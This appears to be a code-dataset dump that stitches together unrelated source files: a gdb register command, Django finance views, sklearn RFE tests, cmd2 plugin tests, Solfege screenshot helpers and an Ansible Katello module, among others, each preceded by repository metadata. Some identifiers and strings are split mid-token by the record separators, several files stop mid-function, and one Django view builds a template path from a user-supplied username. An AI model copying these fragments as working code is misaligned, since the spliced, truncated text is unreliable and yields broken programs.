|
Python
|
mit
| 1,628
| 0
|
# -*- coding: utf-8 -*-

import gxf

from gxf.formatting import Token, Formattable


@gxf.register()
class Registers(gxf.DataCommand):
    '''
    Shows registers.
    '''

    def setup(self, parser):
        # CLI flags for the `registers` command.
        parser.add_argument("-m", "--mark", action='append', default=[],
                            help="Highlight some registers.")
        parser.add_argument("-M", "--mark-used", action='store_true',
                            help="Highlight currently used registers.")

    def run(self, args):
        regs = gxf.Registers()
        memory = gxf.Memory()

        # Registers to highlight: explicit -m flags, plus (with -M) any
        # register referenced by the instruction at the current pc and
        # the registers it impacts.
        tomark = args.mark[:]
        if args.mark_used:
            try:
                dis = gxf.disassemble_lines(regs.get('pc')).lines[:1]
            except gxf.GdbError:
                dis = ()
            for line in dis:
                for _, t in line.tokens[line.instidx:]:
                    tomark.append(t)
                    tomark.extend(regs.impact.get(t, ()))

        for reg, val in regs.regs.items():
            # Skip eflags and the two-letter segment registers (cs, ds, ...).
            if reg == "eflags" or (len(reg) == 2 and reg[1] == "s"):
                continue
            # Choose a token type (display style) for the register name.
            if reg in tomark:
                ttype = Token.Name.Builtin
            elif reg in ("rdi", "rsi", "rdx", "rcx", "r8", "r9"):
                ttype = Token.Text
            elif reg in ("rip", "eip", "rbp", "esp", "rsp", "rax", "eax"):
                ttype = Token.Generic.Heading
            else:
                ttype = Token.Comment
            print("%s%s" % (
                Formattable(((ttype, "%-4s" % reg),
                             (Token.Comment, ": "))),
                memory.refchain(val)))
|
saigkrish/finance
|
PY/views.py
|
Python
|
apache-2.0
| 3,119
| 0.021481
|
from django.http import HttpResponseRedirect, HttpResponse
from django.shortcuts import render
from django.utils.html import escape
from django.views.decorators.csrf import ensure_csrf_cookie
from django.contrib.auth import authenticate, login, logout
import json
# Create your views here.
@ensure_csrf_cookie
def index(request):
    """Render the landing page; the decorator forces the CSRF cookie to be set."""
    return render(request, 'fin/index.html', {})
def table(request,ticker):
    """Render the per-ticker table template ``fin/table_<ticker>.html``."""
    template_name='fin/table_'+ticker+'.html'
    # Fill the type of user programmatically - TBD
    return render(request, template_name, {'user_profile':'anonymous'})
    #return render(request, template_name, {'user_profile':'nameduser'})
    #return render(request, template_name, {'user_profile':'premiumuser'})
def jspractice(request):
    """Render the JavaScript practice page."""
    return render(request, 'fin/js.html', {})
def dfcf_input_modify(request):
    """Debug view: echo every POST field, the parsed ``dfcf_ip_params``
    and ``dfcf_ip_changeset`` JSON payloads, and the raw request, as HTML.

    (Reconstructed: one ``txt += ...`` statement was split by extraction
    artifacts; it is assumed to follow the growth-rate loop -- confirm.)
    """
    txt = ""
    # Raw POST fields.
    for key in request.POST:
        value = request.POST[key]
        txt += str(key) + "::" + str(value) + "<br>"
    txt += "<br><br>"
    # Parsed dfcf_ip_params payload.
    dat = request.POST['dfcf_ip_params']
    jdat = json.loads(dat)
    for key in jdat:
        value = jdat[key]
        txt += str(key) + "::" + str(value) + "<br>"
    txt += "<br><br>"
    # Per-key growth rates, reported as percentages.
    for key in jdat:
        rev_growth = float(jdat[key]['rev_growth'])
        ear_growth = float(jdat[key]['earnings_growth'])
        txt += str(key) + "::" + "revenue grows at" + str(100*rev_growth) + "% <br>"
        txt += str(key) + "::" + "Earnings grow at" + str(100*ear_growth) + "% <br>"
    txt += "<br><br>Changeset details<br><br>"
    # Parsed dfcf_ip_changeset payload.
    changeset = request.POST['dfcf_ip_changeset']
    jchangeset = json.loads(changeset)
    for key in jchangeset:
        value = jchangeset[key]
        txt += str(key) + "::" + str(value) + "<br>"
    txt += "<br><br>"
    # escape() the repr so it is safe to embed in the HTML response.
    txt += escape(repr(request))
    return HttpResponse(txt)
# return HttpResponse(request.POST['fname'])
# caller should ensure it is a POST etc.
def fin_auth (request):
    """Authenticate the ``username``/``password`` in request.POST.

    Returns True and logs the user in when the credentials match an
    active account; False otherwise.  Caller must ensure the request is
    a POST.
    """
    username = request.POST.get('username')
    password = request.POST.get('password')
    user = authenticate(username=username, password=password)
    if user is not None:
        if user.is_active:
            login(request, user)
            return True
    return False
@ensure_csrf_cookie
def dfcf_input(request, action="none"):
    """Render the DCF input-parameters page, handling login/logout.

    Paths: action == "logout" logs out; an authenticated user gets the
    per-user template; a GET gets the anonymous template; a POST is run
    through fin_auth() and, on success, gets the per-user template.

    Fix: a POST with bad credentials previously fell off the end and
    returned None, which makes Django raise "view didn't return an
    HttpResponse" -- it now falls back to the anonymous template.
    """
    template_name='fin/dfcf_input_parameters.html'
    u = request.user
    if action == "logout":
        logout(request)
        return render(request, template_name, {'user_profile':'anonymous'})
    if u.is_authenticated():
        template_name = 'fin/'+u.username+'/dfcf_input_parameters.html'
        return render(request, template_name, {'user_profile':'anonymous'})
    if (request.method != 'POST'):
        return render(request, template_name, {'user_profile':'anonymous'})
    if (fin_auth(request)):
        template_name='fin/'+request.POST.get('username')+'/dfcf_input_parameters.html'
        return render(request, template_name, {'user_profile':'anonymous'})
    #return render(request, template_name, {'user_profile':'nameduser'})
    #return render(request, template_name, {'user_profile':'premiumuser'})
    # Failed authentication: fall back to the anonymous page.
    return render(request, template_name, {'user_profile':'anonymous'})
|
eduNEXT/edunext-platform
|
import_shims/studio/contentstore/config/tests/__init__.py
|
Python
|
agpl-3.0
| 398
| 0.01005
|
"""Deprecated import support. Auto-generated by import_shims/generate_shims.sh."""
# pylint: disable=redefined-builtin,wrong-import-position,wildcard-import,useless-suppression,line-too-long
from import_shims.warn import warn_deprecated_import
warn_deprecated_import('contentstore.config.tests'
|
, 'cms.djangoap
|
ps.contentstore.config.tests')
from cms.djangoapps.contentstore.config.tests import *
|
plotly/python-api
|
packages/python/plotly/plotly/validators/sankey/domain/_row.py
|
Python
|
mit
| 474
| 0.00211
|
import _plotly_utils.basevalidators


class RowValidator(_plotly_utils.basevalidators.IntegerValidator):
    """Auto-generated validator for the ``sankey.domain.row`` property:
    a non-negative integer with edit type "calc"."""

    def __init__(self, plotly_name="row", parent_name="sankey.domain", **kwargs):
        super(RowValidator, self).__init__(
            plotly_name=plotly_name,
            parent_name=parent_name,
            edit_type=kwargs.pop("edit_type", "calc"),
            min=kwargs.pop("min", 0),
            role=kwargs.pop("role", "info"),
            **kwargs
        )
|
Fenixin/Minecraft-Region-Fixer
|
regionfixer_core/interactive.py
|
Python
|
gpl-3.0
| 24,997
| 0.002961
|
#!/usr/bin/env python
# -*- coding: utf-8 -*-
#
# Region Fixer.
# Fix your region files with a backup copy of your Minecraft world.
# Copyright (C) 2020 Alejandro Aguilera (Fenixin)
# https://github.com/Fenixin/Minecraft-Region-Fixer
#
# This program is free software: you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for
|
more details.
#
# You should have received a copy of the GNU General Public License
# along with this program. If not, see <http://www.gnu.org/licenses/>.
#
from cmd import Cmd
import regionfixer_core.constants as c
from regionfixer_core import world
from regionfixer_core.scan import consol
|
e_scan_world, console_scan_regionset
class InteractiveLoop(Cmd):
def __init__(self, world_list, regionset, options, backup_worlds):
Cmd.__init__(self)
self.world_list = world_list
self.regionset = regionset
self.world_names = [str(i.name) for i in self.world_list]
# if there's only one world use it
if len(self.world_list) == 1 and len(self.regionset) == 0:
self.current = world_list[0]
elif len(self.world_list) == 0 and len(self.regionset) > 0:
self.current = self.regionset
else:
self.current = None
self.options = options
self.backup_worlds = backup_worlds
self.prompt = "#-> "
self.intro = ("Minecraft Region-Fixer interactive mode.\n(Use tab to "
"autocomplete. Type help for a list of commands.)\n")
# Possible args for chunks stuff
possible_args = ""
first = True
for i in list(c.CHUNK_PROBLEMS_ARGS.values()) + ['all']:
if not first:
possible_args += ", "
possible_args += i
first = False
self.possible_chunk_args_text = possible_args
# Possible args for region stuff
possible_args = ""
first = True
for i in list(c.REGION_PROBLEMS_ARGS.values()) + ['all']:
if not first:
possible_args += ", "
possible_args += i
first = False
self.possible_region_args_text = possible_args
#################################################
# Do methods
#################################################
def do_set(self, arg):
""" Command to change some options and variables in interactive
mode """
args = arg.split()
if len(args) > 2:
print("Error: too many parameters.")
elif len(args) == 0:
print("Write \'help set\' to see a list of all possible variables")
else:
if args[0] == "entity-limit":
if len(args) == 1:
print("entity-limit = {0}".format(self.options.entity_limit))
else:
try:
if int(args[1]) >= 0:
self.options.entity_limit = int(args[1])
print("entity-limit = {0}".format(args[1]))
print("Updating chunk status...")
self.current.rescan_entities(self.options)
else:
print("Invalid value. Valid values are positive integers and zero")
except ValueError:
print("Invalid value. Valid values are positive integers and zero")
elif args[0] == "workload":
if len(args) == 1:
if self.current:
print("Current workload:\n{0}\n".format(self.current.__str__()))
print("List of possible worlds and region-sets (determined by the command used to run region-fixer):")
number = 1
for w in self.world_list:
print(" ### world{0} ###".format(number))
number += 1
# add a tab and print
for i in w.__str__().split("\n"):
print("\t" + i)
print()
print(" ### regionset ###")
for i in self.regionset.__str__().split("\n"):
print("\t" + i)
print("\n(Use \"set workload world1\" or name_of_the_world or regionset to choose one)")
else:
a = args[1]
if len(a) == 6 and a[:5] == "world" and int(a[-1]) >= 1:
# get the number and choos the correct world from the list
number = int(args[1][-1]) - 1
try:
self.current = self.world_list[number]
print("workload = {0}".format(self.current.world_path))
except IndexError:
print("This world is not in the list!")
elif a in self.world_names:
for w in self.world_list:
if w.name == args[1]:
self.current = w
print("workload = {0}".format(self.current.world_path))
break
else:
print("This world name is not on the list!")
elif args[1] == "regionset":
if len(self.regionset):
self.current = self.regionset
print("workload = set of region files")
else:
print("The region set is empty!")
else:
print("Invalid world number, world name or regionset.")
elif args[0] == "processes":
if len(args) == 1:
print("processes = {0}".format(self.options.processes))
else:
try:
if int(args[1]) > 0:
self.options.processes = int(args[1])
print("processes = {0}".format(args[1]))
else:
print("Invalid value. Valid values are positive integers.")
except ValueError:
print("Invalid value. Valid values are positive integers.")
elif args[0] == "verbose":
if len(args) == 1:
print("verbose = {0}".format(str(self.options.verbose)))
else:
if args[1] == "True":
self.options.verbose = True
print("verbose = {0}".format(args[1]))
elif args[1] == "False":
self.options.verbose = False
print("verbose = {0}".format(args[1]))
else:
print("Invalid value. Valid values are True and False.")
else:
print("Invalid argument! Write \'help set\' to see a list of valid variables.")
def do_summary(self, arg):
""" Prints a summary of all the problems found in the region
files. """
if len(arg) == 0:
if self.current:
if self.current.scanned:
text = self.current.generate_report(True)
if text:
print(text)
else:
print("No problems found!")
else:
print("The world hasn't be scanned (or it needs a rescan). Use \'scan\' to scan it.")
else:
print("No world/region-set is set! Use \'set workload\' to set a w
|
yuanyelele/solfege
|
solfege/make_screenshots.py
|
Python
|
gpl-3.0
| 6,516
| 0.001842
|
import os
import time
from gi.repository import Gtk
import solfege
from solfege.profilemanager import ChangeProfileDialog
from solfege.practisesheetdlg import PractiseSheetDialog
from solfege.trainingsetdlg import TrainingSetDialog
def run(cmd):
    """Echo *cmd*, then execute it through the shell."""
    print cmd
    os.system(cmd)
def compress(fn):
    """Quantize the PNG *fn* to 16 colours with pngnq, replacing it in place."""
    f, ext = os.path.splitext(fn)
    run("pngnq -n 16 -f %s" % fn)
    # pngnq writes <name>-nq8.png; move it back over the original.
    run("mv %s-nq8.png %s" % (f, fn))
def screenshot(windowtitle, lang, fn):
    """Capture X window *windowtitle* into help/<lang>/figures/<fn>.

    Pumps pending GTK events and sleeps briefly so the window is fully
    drawn before ImageMagick's `import` grabs it, then compresses the
    resulting PNG.
    """
    while Gtk.events_pending():
        Gtk.main_iteration()
    time.sleep(2)
    while Gtk.events_pending():
        Gtk.main_iteration()
    fn = "help/%s/figures/%s" % (lang, fn)
    cmd = u'import -window %s %s' % (windowtitle, fn)
    print cmd
    os.system(cmd.encode("utf-8"))
    compress(fn)
def do_profile_manager(lang):
    """Screenshot the profile-manager dialog."""
    p = ChangeProfileDialog(solfege.app.m_options.profile)
    p.show()
    # hex X window id, in the form `import -window` expects
    pid = hex(p.vbox.get_parent_window().xid)
    screenshot(pid, lang, "profile-manager.png")
    p.destroy()
def do_practise_sheet(lang):
    """Screenshot the ear-training-test printout editor."""
    dlg = PractiseSheetDialog()
    dlg.show_all()
    pid = hex(dlg.vbox.get_parent_window().xid)
    dlg.on_select_exercise(None, u'solfege:lesson-files/melodic-intervals-down-3')
    screenshot(pid, lang, "ear-training-test-printout-editor.png")
    dlg.do_closing_stuff()
    dlg.destroy()
def do_training_set(lang):
    """Screenshot the training-set editor with two exercises selected."""
    dlg = TrainingSetDialog()
    dlg.show_all()
    dlg.on_select_exercise(None, u'solfege:lesson-files/chord-m7-7')
    dlg.on_select_exercise(None, u'solfege:lesson-files/melodic-intervals-up')
    pid = hex(dlg.get_children()[0].get_parent_window().xid)
    screenshot(pid, lang, "trainingset-editor.png")
    dlg.do_closing_stuff()
    dlg.destroy()
def do_preferences_window(lang):
    """Screenshot every page of the preferences window.

    Each set_cursor() call selects a row in the preferences tree view,
    switching the visible page before the next capture.
    """
    solfege.win.open_preferences_window(None)
    xid = hex(solfege.win.g_config_window.get_children()[0].get_parent_window().xid)
    solfege.win.g_config_window.set_resizable(False)
    solfege.win.g_config_window.set_position(Gtk.WindowPosition.CENTER_ALWAYS)
    solfege.win.g_config_window.g_pview.expand_all()
    screenshot(xid, lang, "preferences-midi.png")
    solfege.win.g_config_window.g_pview.set_cursor((1,))
    screenshot(xid, lang, "preferences-user.png")
    solfege.win.g_config_window.g_pview.set_cursor((2,))
    screenshot(xid, lang, "preferences-external-programs.png")
    solfege.win.g_config_window.g_pview.set_cursor((3,))
    screenshot(xid, lang, "preferences-gui.png")
    solfege.win.g_config_window.g_pview.set_cursor((3, 0))
    screenshot(xid, lang, "preferences-gui-idtone.png")
    solfege.win.g_config_window.g_pview.set_cursor((3, 1))
    screenshot(xid, lang, "preferences-gui-interval.png")
    solfege.win.g_config_window.g_pview.set_cursor((4,))
    screenshot(xid, lang, "preferences-practise.png")
    solfege.win.g_config_window.g_pview.set_cursor((5,))
    screenshot(xid, lang, "preferences-sound-setup.png")
    solfege.win.g_config_window.g_pview.set_cursor((6,))
    screenshot(xid, lang, "preferences-statistics.png")
    solfege.win.g_config_window.hide()
def do_exercises(lang, xid):
    """Open a fixed list of exercises and capture one screenshot of each
    into help/<lang>/figures/.

    (Reconstructed: extraction artifacts split two lines of the
    original.)
    """
    solfege.app.practise_lessonfile(u"solfege:lesson-files/harmonic-intervals-3")
    solfege.win.get_view().use_inputwidget(0)
    screenshot(xid, lang, "id-interval-buttons-thirds.png")
    solfege.win.get_view().use_inputwidget(1)
    screenshot(xid, lang, "id-interval-piano.png")
    solfege.win.get_view().g_notebook.set_current_page(2)
    screenshot(xid, lang, "statistics.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/melodic-intervals-3")
    solfege.win.get_view().use_inputwidget(0)
    screenshot(xid, lang, "melodicinterval-buttons.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/sing-intervals-4-5")
    solfege.win.get_view().new_question()
    screenshot(xid, lang, "singinterval.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/chord-min-major")
    screenshot(xid, lang, "idbyname-chords.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/chord-min-major-close-open")
    screenshot(xid, lang, "chord.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/singchord-1")
    solfege.win.get_view().new_question()
    screenshot(xid, lang, "singchord.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/rhythm-easy")
    solfege.win.get_view().new_question()
    screenshot(xid, lang, "rhythm.png")
    solfege.app.practise_lessonfile(u"solfege:regression-lesson-files/rhythmtapping2-1")
    screenshot(xid, lang, "rhythmtapping2.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/jsb-inventions")
    screenshot(xid, lang, "dictation.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/csound-fifth-0.99")
    screenshot(xid, lang, "idbyname-intonation.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/id-tone-cde-3")
    screenshot(xid, lang, "idtone.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/bpm")
    screenshot(xid, lang, "identifybpm.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/twelvetone")
    solfege.win.get_view().new_question()
    screenshot(xid, lang, "twelvetone.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/nameinterval-2")
    solfege.win.get_view().new_question()
    screenshot(xid, lang, "nameinterval.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/progression-2")
    screenshot(xid, lang, "elembuilder-harmonic-progressions.png")
    solfege.app.practise_lessonfile(u"solfege:lesson-files/toneincontext-major-f4")
    screenshot(xid, lang, "toneincontext.png")
def make_screenshots():
    """Regenerate all documentation screenshots for the current LANGUAGE.

    Refuses to run unless invoked from the Solfege source directory, and
    quits the program when finished or on error.
    """
    if not (os.path.exists("configure.ac")
            and os.path.exists("help/C/solfege.xml.in")
            and os.path.exists("solfege.py")):
        print "I don't think you are in the source directory of"
        print "GNU Solfege, so I refuse to continue."
        solfege.win.quit_program()
        return
    # LANGUAGE may be "ll_CC:fallback"; try the full code, then just "ll".
    lang = os.environ['LANGUAGE'].split(":")[0]
    if not os.path.exists(os.path.join("help", lang)):
        lang = lang.split("_")[0]
        if not os.path.exists(os.path.join("help", lang)):
            print "Unknown language"
            solfege.win.quit_program()
            return
    xid = hex(solfege.win.get_view().get_parent_window().xid)
    if not os.path.exists("help/%s/figures" % lang):
        os.makedirs("help/%s/figures" % lang)
    do_profile_manager(lang)
    do_practise_sheet(lang)
    do_training_set(lang)
    do_preferences_window(lang)
    do_exercises(lang, xid)
    solfege.win.quit_program()
|
NdagiStanley/inventory
|
manage.py
|
Python
|
mit
| 807
| 0
|
#!/usr/bin/env python
"""Django's command-line utility for the 'inventory' project."""
import os
import sys

if __name__ == "__main__":
    # Default settings module; an existing DJANGO_SETTINGS_MODULE in the
    # environment takes precedence.
    os.environ.setdefault("DJANGO_SETTINGS_MODULE", "inventory.settings")
    try:
        from django.core.management import execute_from_command_line
    except ImportError:
        # The above import may fail for some other reason. Ensure that the
        # issue is really that Django is missing to avoid masking other
        # exceptions on Python 2.
        try:
            import django
        except ImportError:
            raise ImportError(
                "Couldn't import Django. Are you sure it's installed and "
                "available on your PYTHONPATH environment variable? Did you "
                "forget to activate a virtual environment?"
            )
        raise
    execute_from_command_line(sys.argv)
|
Eric89GXL/scikit-learn
|
sklearn/feature_selection/tests/test_rfe.py
|
Python
|
bsd-3-clause
| 3,356
| 0.000298
|
"""
Testing Recursive feature elimination
"""
import warnings
import numpy as np
from numpy.testing import assert_array_almost_equal, assert_array_equal
from nose.tools import assert_equal
from scipy import sparse
from sklearn.feature_selection.rfe import RFE, RFECV
from sklearn.datasets import load_iris
from sklearn.metrics import zero_one_loss
from sklearn.svm import SVC
from sklearn.utils import check_random_state
from sklearn.metrics.scorer import SCORERS
def test_rfe_set_params():
    """RFE must honour estimator_params: configuring the SVC kernel via
    estimator_params must give the same predictions as a pre-configured
    SVC.  (Reconstructed around two extraction-artifact splits.)
    """
    generator = check_random_state(0)
    iris = load_iris()
    # Add 6 noisy features so RFE has something to eliminate.
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    y = iris.target

    clf = SVC(kernel="linear")
    rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
    y_pred = rfe.fit(X, y).predict(X)

    clf = SVC()
    rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1,
              estimator_params={'kernel': 'linear'})
    y_pred2 = rfe.fit(X, y).predict(X)
    assert_array_equal(y_pred, y_pred2)
def test_rfe():
    """RFE must select the informative iris features and give identical
    results on dense and sparse input."""
    generator = check_random_state(0)
    iris = load_iris()
    # Add 6 noisy features so RFE has something to eliminate.
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    X_sparse = sparse.csr_matrix(X)
    y = iris.target
    # dense model
    clf = SVC(kernel="linear")
    rfe = RFE(estimator=clf, n_features_to_select=4, step=0.1)
    rfe.fit(X, y)
    X_r = rfe.transform(X)
    clf.fit(X_r, y)
    assert_equal(len(rfe.ranking_), X.shape[1])
    # sparse model
    clf_sparse = SVC(kernel="linear")
    rfe_sparse = RFE(estimator=clf_sparse, n_features_to_select=4, step=0.1)
    rfe_sparse.fit(X_sparse, y)
    X_r_sparse = rfe_sparse.transform(X_sparse)
    # The 4 selected features should be the original iris columns.
    assert_equal(X_r.shape, iris.data.shape)
    assert_array_almost_equal(X_r[:10], iris.data[:10])
    assert_array_almost_equal(rfe.predict(X), clf.predict(iris.data))
    assert_equal(rfe.score(X, y), clf.score(iris.data, iris.target))
    assert_array_almost_equal(X_r, X_r_sparse.toarray())
def test_rfecv():
    """RFECV must filter out the injected noise features, on dense and
    sparse input, and with a custom loss function or scorer."""
    generator = check_random_state(0)
    iris = load_iris()
    # Add 6 noisy features; RFECV should remove exactly these.
    X = np.c_[iris.data, generator.normal(size=(len(iris.data), 6))]
    y = list(iris.target)   # regression test: list should be supported
    # Test using the score function
    rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5)
    rfecv.fit(X, y)
    # non-regression test for missing worst feature:
    assert_equal(len(rfecv.grid_scores_), X.shape[1])
    assert_equal(len(rfecv.ranking_), X.shape[1])
    X_r = rfecv.transform(X)
    # All the noisy variable were filtered out
    assert_array_equal(X_r, iris.data)
    # same in sparse
    rfecv_sparse = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5)
    X_sparse = sparse.csr_matrix(X)
    rfecv_sparse.fit(X_sparse, y)
    X_r_sparse = rfecv_sparse.transform(X_sparse)
    assert_array_equal(X_r_sparse.toarray(), iris.data)
    # Test using a customized loss function
    rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
                  loss_func=zero_one_loss)
    with warnings.catch_warnings(record=True):
        # loss_func is deprecated; the warning is expected and ignored.
        rfecv.fit(X, y)
    X_r = rfecv.transform(X)
    assert_array_equal(X_r, iris.data)
    # Test using a scorer
    scorer = SCORERS['accuracy']
    rfecv = RFECV(estimator=SVC(kernel="linear"), step=1, cv=5,
                  scoring=scorer)
    rfecv.fit(X, y)
    X_r = rfecv.transform(X)
    assert_array_equal(X_r, iris.data)
|
python-cmd2/cmd2
|
plugins/template/tests/test_myplugin.py
|
Python
|
mit
| 1,894
| 0.000528
|
#
# coding=utf-8
import cmd2_myplugin
from cmd2 import (
cmd2,
)
######
#
# define a class which uses our plugin and some convenience functions
#
######
class MyApp(cmd2_myplugin.MyPluginMixin, cmd2.Cmd):
    """Simple subclass of cmd2.Cmd with our SayMixin plugin included."""
    def __init__(self, *args, **kwargs):
        super().__init__(*args, **kwargs)
    @cmd2_myplugin.empty_decorator
    def do_empty(self, args):
        # `empty` command: prints one fixed line; exists to exercise the
        # plugin's decorator.
        self.poutput("running the empty command")
#
# You can't use a fixture to instantiate your app if you want
# to use the capsys fixture to capture the output. cmd2.Cmd sets
# internal variables to sys.stdout and sys.stderr on initialization
# and then uses those internal variables instead of sys.stdout. It does
# this so you can redirect output from within the app. The capsys fixture
# can't capture the output properly in this scenario.
#
# If you have extensive initialization needs, create a function
# to initialize your cmd2 application.
def init_app():
    """Return a freshly constructed MyApp instance for a test to use."""
    return MyApp()
#####
#
# unit tests
#
#####
def test_say(capsys):
    """The mixed-in `say` command echoes its argument after the hook output."""
    # call our initialization function instead of using a fixture
    app = init_app()
    # run our mixed in command
    app.onecmd_plus_hooks('say hello')
    # use the capsys fixture to retrieve the output on stdout and stderr
    out, err = capsys.readouterr()
    # make our assertions
    assert out == 'in postparsing hook\nhello\n'
    assert not err
def test_decorator(capsys):
    """empty_decorator must print its marker line before the command output."""
    # call our initialization function instead of using a fixture
    app = init_app()
    # run one command in the app
    app.onecmd_plus_hooks('empty')
    # use the capsys fixture to retrieve the output on stdout and stderr
    out, err = capsys.readouterr()
    # make our assertions
    assert out == 'in postparsing hook\nin the empty decorator\nrunning the empty command\n'
    assert not err
|
fake-name/ReadableWebProxy
|
WebMirror/management/rss_parser_funcs/feed_parse_extractIanEnglishmanabroadBlogspotCom.py
|
Python
|
bsd-3-clause
| 577
| 0.032929
|
def extractIanEnglishmanabroadBlogspotCom(item):
    '''
    Parser for 'ian-englishmanabroad.blogspot.com'.

    Returns a release message for tagged items, None for previews or
    untitled chapters, False when no tag matches.  (Reconstructed around
    two extraction-artifact splits.)
    '''
    vol, chp, frag, postfix = extractVolChapterFragmentPostfix(item['title'])
    if not (chp or vol) or "preview" in item['title'].lower():
        return None
    # (tag to match, release name, translation type)
    tagmap = [
        ('PRC', 'PRC', 'translated'),
        ('Loiterous', 'Loiterous', 'oel'),
    ]
    for tagname, name, tl_type in tagmap:
        if tagname in item['tags']:
            return buildReleaseMessageWithType(item, name, vol, chp, frag=frag, postfix=postfix, tl_type=tl_type)
    return False
|
pgurumur/netconf
|
core/lib/__init__.py
|
Python
|
isc
| 791
| 0.001264
|
# Copyright (c) 2015 Prabhu Gurumurthy <pgurumur@users.noreply.github.com>
# Permission to use, copy, modify, and distribute this software for any
# purpose with or without fee is hereby granted, provided that the above
# copyright notice and this permission notice appear in all copies.
# THE SOFTWARE IS PROVIDED "AS IS" AND THE AUTHOR DISCLAIMS ALL WARRANTIES
# WITH REGARD TO THIS SOFTWARE INCLUDING ALL IMPLIED WARRANTIES OF
# MERCHANTABILITY AND FITNESS. IN NO EVENT SHALL THE AUTHOR BE LIABLE FOR
# ANY SPECIAL, DIRECT, INDIRECT, OR CONSEQUENTIAL DAMAGES OR ANY DAMAGES
# WHATSOEVER RESULTING FROM LOSS OF USE, DATA OR PROFITS, WHETHER IN AN
# ACTION OF CONTRACT, NEGLIGENCE OR OTHER TORTIOUS ACTION, ARISING OUT OF
# OR IN CONNECTION WITH THE USE OR PERFORMANCE OF THIS SOFTWARE.
|
Tatsh-ansible/ansible
|
lib/ansible/modules/remote_management/foreman/katello.py
|
Python
|
gpl-3.0
| 16,607
| 0.002409
|
#!/usr/bin/python
# -*- coding: utf-8 -*-
# (c) 2016, Eric D Helms <ericdhelms@gmail.com>
# GNU General Public License v3.0+ (see COPYING or https://www.gnu.org/licenses/gpl-3.0.txt)
from __future__ import absolute_import, division, print_function
__metaclass__ = type
ANSIBLE_METADATA = {'metadata_version': '1.0',
'status': ['preview'],
'supported_by': 'community'}
DOCUMENTATION = '''
---
module: katello
short_description: Manage Katello Resources
description:
- Allows the management of Katello resources inside your Foreman server
version_added: "2.3"
author: "Eric D Helms (@ehelms)"
requirements:
- "nailgun >= 0.28.0"
- "python >= 2.6"
- datetime
options:
server_url:
description:
- URL of Foreman server
required: true
username:
description:
- Username on Foreman server
required: true
password:
description:
- Password for user accessing Foreman server
required: true
entity:
description:
- The Foreman resource that the action will be performed on (e.g. organization, host)
required: true
params:
description:
- Parameters associated to the entity resource to set or edit in dictionary format (e.g. name, description)
required: true
'''
EXAMPLES = '''
---
# Simple Example:
- name: "Create Product"
local_action:
module: katello
username: "admin"
password: "admin"
server_url: "https://fakeserver.com"
entity: "product"
params:
name: "Centos 7"
# Abstraction Example:
# katello.yml
---
- name: "{{ name }}"
local_action:
module: katello
username: "admin"
password: "admin"
server_url: "https://fakeserver.com"
entity: "{{ entity }}"
params: "{{ params }}"
# tasks.yml
---
- include: katello.yml
vars:
name: "Create Dev Environment"
entity: "lifecycle_environment"
params:
name: "Dev"
prior: "Library"
organization: "Default Organization"
- include: katello.yml
vars:
name: "Create Centos Product"
entity: "product"
params:
name: "Centos 7"
organization: "Default Organization"
- include: katello.yml
vars:
name: "Create 7.2 Repository"
entity: "repository"
params:
name: "Centos 7.2"
product: "Centos 7"
organization: "Default Organization"
content_type: "yum"
url: "http://mirror.centos.org/centos/7/os/x86_64/"
- include: katello.yml
vars:
name: "Create Centos 7 View"
entity: "content_view"
params:
name: "Centos 7 View"
organization: "Default Organization"
repositories:
- name: "Centos 7.2"
product: "Centos 7"
- include: katello.yml
vars:
name: "Enable RHEL Product"
entity: "repository_set"
params:
name: "Red Hat Enterprise Linux 7 Server (RPMs)"
product: "Red Hat Enterprise Linux Server"
organization: "Default Organization"
basearch: "x86_64"
releasever: "7"
'''
RETURN = '''# '''
import datetime
import os
import traceback
try:
from nailgun import entities, entity_fields, entity_mixins
from nailgun.config import ServerConfig
HAS_NAILGUN_PACKAGE = True
except:
HAS_NAILGUN_PACKAGE = False
from ansible.module_utils.basic import AnsibleModule
from ansible.module_utils._text import to_native
class NailGun(object):
def __init__(self, server, entities, module):
self._server = server
self._entities = entities
self._module = module
entity_mixins.TASK_TIMEOUT = 1000
def find_organization(self, name, **params):
org = self._entities.Organization(self._server, name=name, **params)
response = org.search(set(), {'search': 'name={}'.format(name)})
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No organization found for %s" % name)
def find_lifecycle_environment(self, name, organization):
org = self.find_organization(organization)
lifecycle_env = self._entities.LifecycleEnvironment(self._server, name=name, organization=org)
response = lifecycle_env.search()
|
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No Lifecycle Found found for %s" % name)
def find_product(self, name, org
|
anization):
org = self.find_organization(organization)
product = self._entities.Product(self._server, name=name, organization=org)
response = product.search()
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No Product found for %s" % name)
def find_repository(self, name, product, organization):
product = self.find_product(product, organization)
repository = self._entities.Repository(self._server, name=name, product=product)
repository._fields['organization'] = entity_fields.OneToOneField(entities.Organization)
repository.organization = product.organization
response = repository.search()
if len(response) == 1:
return response[0]
else:
self._module.fail_json(msg="No Repository found for %s" % name)
def find_content_view(self, name, organization):
org = self.find_organization(organization)
